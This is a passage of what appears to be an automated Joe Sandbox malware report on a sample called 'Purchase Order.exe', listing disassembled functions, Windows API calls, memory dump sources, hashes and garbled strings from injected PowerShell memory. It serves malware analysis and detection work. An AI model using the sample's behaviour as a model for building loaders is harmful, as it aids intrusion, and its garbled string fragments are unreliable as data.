                                                          • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-823278215
                                                          • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                          • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                          • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                          • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                          Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004057EE
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004057FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1246513382
                                                          • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                          • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                          • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                          • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                          Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

                                                          Executed Functions

                                                          Function 0446F010 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d24959183bd35ba3ad28bf5de1505637f3cb5328d921db052229a9ce8756ca86
                                                          • Instruction ID: 5ab4fd118a67a0313cdbf6ad6bc1e007c6fd35133ab1ab89e72d3bdfba64c3b6
                                                          • Opcode Fuzzy Hash: d24959183bd35ba3ad28bf5de1505637f3cb5328d921db052229a9ce8756ca86
                                                          • Instruction Fuzzy Hash: 18B14E70E00209CFDF14CFA9E98579EBBF2AB48354F14852AD456A7354EB74A849CF82
                                                          Function 0446F8E0 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cffe10869c9fb43b3e11384e7eff10790fccfc71e361574387493b021c72d4cd
                                                          • Instruction ID: b58a2e02a2b82b557f43b3c228066fbf1e1ca4e1658623fcbebaffb9e94ef7f6
                                                          • Opcode Fuzzy Hash: cffe10869c9fb43b3e11384e7eff10790fccfc71e361574387493b021c72d4cd
                                                          • Instruction Fuzzy Hash: B5B17270E002099FDF10CFA9D98579EBBF2BF48714F14852AD456E7354EB74A849CB82
                                                          Function 0741C278 Relevance: 25.8, Strings: 20, Instructions: 828COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$DUjk$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-598723919
                                                          • Opcode ID: 08462577df4a1e36595a28888b223cba893f1dcd0883841ee3978992fde7d3d6
                                                          • Instruction ID: 7ca3e831c0e0294b30ebeb8617d0e97421a3e28aa9ea2e022965cd5c990a5d60
                                                          • Opcode Fuzzy Hash: 08462577df4a1e36595a28888b223cba893f1dcd0883841ee3978992fde7d3d6
                                                          • Instruction Fuzzy Hash: 5152D3F1B44205DFCB14EBA8C9916EBBBE2AF85310F14846BD9059B751DB32DC42CBA1
                                                          Function 07416A10 Relevance: 18.2, Strings: 14, Instructions: 749COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-2908486730
                                                          • Opcode ID: 1d622508cd28d3a0ec3b4f030cc2e1651606fdc653380686f0aaf6be84b30005
                                                          • Instruction ID: 778cfaa7132fb8420df4c0724dcdc3d463766eaf1b826bbf51894a99d4783291
                                                          • Opcode Fuzzy Hash: 1d622508cd28d3a0ec3b4f030cc2e1651606fdc653380686f0aaf6be84b30005
                                                          • Instruction Fuzzy Hash: 964218B1B042069FCB25AB78C9516EBBBA2AFC5310F1584ABD505CB351DF32D942C792
                                                          Function 07413178 Relevance: 16.6, Strings: 12, Instructions: 1614COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$(fzl$(fzl$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$x.kk$-kk
                                                          • API String ID: 0-4102582495
                                                          • Opcode ID: 0c289c39e525052d8523e2aae448b767071925ed1d0af9f5faaef7d31f9aa97e
                                                          • Instruction ID: dde541643c11ceb9ada27add90650784fdc9278bcadf15c471662c416ccb0b23
                                                          • Opcode Fuzzy Hash: 0c289c39e525052d8523e2aae448b767071925ed1d0af9f5faaef7d31f9aa97e
                                                          • Instruction Fuzzy Hash: B0E295B0B00245DFDB14DFA8C541BAABBB2AF85314F15C5AAE9059F791CB32DC42CB91
                                                          Function 074185B8 Relevance: 14.7, Strings: 11, Instructions: 928COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$4wl$4wl$x.kk$x.kk$-kk
                                                          • API String ID: 0-773678778
                                                          • Opcode ID: 106c0533d475dce2c3305c23467de7003c5910d9ef84a1518c48ef2f59354b1f
                                                          • Instruction ID: 5821932331f3b9f8183508608a4de567cd9d4775fee47c5d75c87554d2f860fa
                                                          • Opcode Fuzzy Hash: 106c0533d475dce2c3305c23467de7003c5910d9ef84a1518c48ef2f59354b1f
                                                          • Instruction Fuzzy Hash: EA9251B0A00214DFD754DB58C951BAABBB2BF85304F1081E5E909AF795CB72ED82CF91
                                                          Function 0741DF38 Relevance: 14.2, Strings: 11, Instructions: 493COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$pl$pl$pl$pl
                                                          • API String ID: 0-2770468276
                                                          • Opcode ID: b2bc2b1181ee7b040d3aaaaea23fc1fb95e9e4d83e201be93a5063f38623c7a0
                                                          • Instruction ID: c2870ff72fa47c8bc16031c103dc7556aaf103a080da20c74c5c7edb356d2cb1
                                                          • Opcode Fuzzy Hash: b2bc2b1181ee7b040d3aaaaea23fc1fb95e9e4d83e201be93a5063f38623c7a0
                                                          • Instruction Fuzzy Hash: 65F13AF6B042268FCB14ABB894016EBBBE2AFC5311F1480BBD945CB751DB32D946C791
                                                          Function 07410778 Relevance: 10.6, Strings: 8, Instructions: 603COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-830428688
                                                          • Opcode ID: b2f3f4901ef9eb5906f51d65a201a8111a41e99e95b0df9bc5cb8aa8bf2e0ed4
                                                          • Instruction ID: ca5b3d4c89aa5c0fc85dfaa5f5c84f87014886db177b4d5985d99309fc3d1381
                                                          • Opcode Fuzzy Hash: b2f3f4901ef9eb5906f51d65a201a8111a41e99e95b0df9bc5cb8aa8bf2e0ed4
                                                          • Instruction Fuzzy Hash: 78123DB17082468FCB15AB6984516ABBBE2AFC5214F24C46BD545DB362DF31C8C2C7A1
                                                          Function 07414EA0 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-3999790251
                                                          • Opcode ID: 80503ff6dcb75b5ff365ab3b5258c63eac9fea4d3bdc0550ee591fde35daea51
                                                          • Instruction ID: a7f2da7ba2696544929b6ed48af3d1139255a6d92b972eb083d7eadf61d23b38
                                                          • Opcode Fuzzy Hash: 80503ff6dcb75b5ff365ab3b5258c63eac9fea4d3bdc0550ee591fde35daea51
                                                          • Instruction Fuzzy Hash: 41E1B3B1B102059FCB14EBA8C541B9EBBB3AFC4304F24D569E5056F795CB72EC828B91
                                                          Function 07414E82 Relevance: 6.6, Strings: 5, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-2833815769
                                                          • Opcode ID: 0007f19047eee3ba47203d3ff7056f088da8d2c4119f126356efa97c8817b090
                                                          • Instruction ID: fd12c1c713b34a93cbb53cb3fa91be2374e0b7815b88f7f176ee90c4f9265a36
                                                          • Opcode Fuzzy Hash: 0007f19047eee3ba47203d3ff7056f088da8d2c4119f126356efa97c8817b090
                                                          • Instruction Fuzzy Hash: 76C193B1A002059FCB14EF98C541BDEFBB2AF85304F25D55AE5056F396CB72E882CB91
                                                          Function 07413E3C Relevance: 6.1, Strings: 4, Instructions: 1095COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$x.kk$-kk
                                                          • API String ID: 0-2898014252
                                                          • Opcode ID: 6dc702d1a2c415ba9be8d5233cc1b84024861322a496a8f81b14819781a18135
                                                          • Instruction ID: d7f6de1b618f60f732939c60d9814963498e79de523a6fa176ad3f1b082cbc22
                                                          • Opcode Fuzzy Hash: 6dc702d1a2c415ba9be8d5233cc1b84024861322a496a8f81b14819781a18135
                                                          • Instruction Fuzzy Hash: 5BA25FB4A00205DFDB14DF58C541B9ABBB2BF85314F24C599E909AF792CB72EC42CB91
                                                          Function 07418E7D Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: c1f603231ce36e59b0a65bfcae0a029749f56fdfd715321621ba1e957cd076b3
                                                          • Instruction ID: b32d5a1d9d5a167ddedece67627cd10d0f4c1592db4c0bfa49fc2adc48d9ec9b
                                                          • Opcode Fuzzy Hash: c1f603231ce36e59b0a65bfcae0a029749f56fdfd715321621ba1e957cd076b3
                                                          • Instruction Fuzzy Hash: 54125CB4A00215DFD764DB58C954BEAB7B2BF85304F1080A5E909AF791CB72ED86CF81
                                                          Function 07419011 Relevance: 5.3, Strings: 4, Instructions: 334COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: b66bed78e2c71aa82fe2958ba554831d98e3a38886570de764b9af434965e1be
                                                          • Instruction ID: 99a61efe4b8d2c4ed59ad9050fb266c99d32638524da70b085682336bca7be5e
                                                          • Opcode Fuzzy Hash: b66bed78e2c71aa82fe2958ba554831d98e3a38886570de764b9af434965e1be
                                                          • Instruction Fuzzy Hash: C9E15CB4A00215DFD760DB58C955BEAB7B2BF85304F1180E5E909AF791CB32AD86CF81
                                                          Function 07418E67 Relevance: 5.3, Strings: 4, Instructions: 332COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$4'sq$4wl$x.kk
                                                          • API String ID: 0-17863173
                                                          • Opcode ID: 2d533d775518b56e1981ac3eee2997bcb91855c5a8c4276df5c186e9bde3e8c5
                                                          • Instruction ID: 45b36156754910ce2a1c82234c3d36dcdaf306195f57d97b3db3b945121716a0
                                                          • Opcode Fuzzy Hash: 2d533d775518b56e1981ac3eee2997bcb91855c5a8c4276df5c186e9bde3e8c5
                                                          • Instruction Fuzzy Hash: 2CE15DB0A00215DFD760DB58C955BEAB7B2BF85304F1080E5E909AF791CB72AD86CF81
                                                          Function 074134FC Relevance: 4.3, Strings: 3, Instructions: 578COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: 7141ea1a1fc84d347cf92be56e1181ba7b21034307d66bed7c4fd48b6a861847
                                                          • Instruction ID: 25e079899d8361242c84a417865b5780b52e026347a143c0523cd4575850492f
                                                          • Opcode Fuzzy Hash: 7141ea1a1fc84d347cf92be56e1181ba7b21034307d66bed7c4fd48b6a861847
                                                          • Instruction Fuzzy Hash: BC3251B4A002059FDB14DF58C941B9ABBB2AF84314F25C599E909AF791CB72EC42CF91
                                                          Function 07418CF6 Relevance: 4.3, Strings: 3, Instructions: 559COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: c4b440ef865aaa1fd37495718cc511851f5b5a93b1ad48ff883c3f347d133ba5
                                                          • Instruction ID: 542c14c230188b748ab6b12941e09151397dc218fbd47fc9be19bfbdf4318d13
                                                          • Opcode Fuzzy Hash: c4b440ef865aaa1fd37495718cc511851f5b5a93b1ad48ff883c3f347d133ba5
                                                          • Instruction Fuzzy Hash: 85328FB0B002149FD750DB58C951FAABBB3AF85314F1084A5E909AF791CB72ED828F91
                                                          Function 0446B920 Relevance: 4.3, Strings: 3, Instructions: 518COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hwq$$sq$$sq
                                                          • API String ID: 0-2950745084
                                                          • Opcode ID: d87837133c30384fd281a21b43a6aae6180079a1baf59a78355fda81fadd94f9
                                                          • Instruction ID: c006377f69736d038e4b622d6250626a753583c400982b7f904ebe4bda96b888
                                                          • Opcode Fuzzy Hash: d87837133c30384fd281a21b43a6aae6180079a1baf59a78355fda81fadd94f9
                                                          • Instruction Fuzzy Hash: 1E225F34B001549FDB29DB64D8947AEB7B2EF89304F1444AAD40AAB361DF35ED85CF81
                                                          Function 07413F48 Relevance: 4.2, Strings: 3, Instructions: 430COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: e2a3ef63771e9aebed2c6154773327a7ea7116aeec0bbe24418c1e2481526330
                                                          • Instruction ID: 4c13865658d5c8021749b895e1ed7927514a0ebab9a31902f415a09d6b3e4e10
                                                          • Opcode Fuzzy Hash: e2a3ef63771e9aebed2c6154773327a7ea7116aeec0bbe24418c1e2481526330
                                                          • Instruction Fuzzy Hash: 480243B4B002059FDB14DF58C941B9ABBB2EF84314F148599E909AF791CB71ED81CF91
                                                          Function 07418DDF Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$x.kk$-kk
                                                          • API String ID: 0-3143426489
                                                          • Opcode ID: 9271f5ea362310067f93d6c6d9c0ceec214fb610f7e84ec5531abb5e087a2ae4
                                                          • Instruction ID: f12dcf6aa0c24c79c3fccfff3382b22c58e8c3b87a2db6a7714c9bd757351943
                                                          • Opcode Fuzzy Hash: 9271f5ea362310067f93d6c6d9c0ceec214fb610f7e84ec5531abb5e087a2ae4
                                                          • Instruction Fuzzy Hash: CA027EB0B002149FD754DB58C951FAABBB2EF85314F108499E909AF791CB72ED82CF91
                                                          Function 07411670 Relevance: 3.0, Strings: 2, Instructions: 482COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl
                                                          • API String ID: 0-1925437669
                                                          • Opcode ID: 6b1c7d42631aa0ef27bac0fcc6b92883ed4a18717466e30d04e316b043bcce20
                                                          • Instruction ID: e2f85f55570684b9348f6aca8f5f7d4690f02f4b934da912169ef84bbcba1744
                                                          • Opcode Fuzzy Hash: 6b1c7d42631aa0ef27bac0fcc6b92883ed4a18717466e30d04e316b043bcce20
                                                          • Instruction Fuzzy Hash: 011261B4B012099FCB54DB98C541AAABBF3AF85304F14C1AAD915AF751DB32EC42CB91
                                                          Function 07414844 Relevance: 3.0, Strings: 2, Instructions: 465COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl
                                                          • API String ID: 0-1925437669
                                                          • Opcode ID: d06a7b955824bfe69a82f7f6fb0891cfdc10197fb3211dcaac24b41f01cddd28
                                                          • Instruction ID: c790f36e48bada8145e41f43d8d57724ef247d432b20b6e13f734b825bab6732
                                                          • Opcode Fuzzy Hash: d06a7b955824bfe69a82f7f6fb0891cfdc10197fb3211dcaac24b41f01cddd28
                                                          • Instruction Fuzzy Hash: 76124CF4A01285DFCB14DF98C541EAABBB2AF85304F25C15AE915AF751CB32ED42CB81
                                                          Function 07411B3E Relevance: 2.9, Strings: 2, Instructions: 422COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$h2mk
                                                          • API String ID: 0-428152705
                                                          • Opcode ID: 6bcec536ea2087bc8cc7f7e6b8712bdb4f33cdfdca00ff525dc484f8017f8cb9
                                                          • Instruction ID: eddd92b3fc0549146da7685775dfdb3cd97f65644a3be8869462b55ed136b1d2
                                                          • Opcode Fuzzy Hash: 6bcec536ea2087bc8cc7f7e6b8712bdb4f33cdfdca00ff525dc484f8017f8cb9
                                                          • Instruction Fuzzy Hash: 8A024BB4B01209DFDB14DB58C540EAABBB2EF85304F14C1AAEA15AF751D772EC42CB91
                                                          Function 07411666 Relevance: 1.6, Strings: 1, Instructions: 389COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
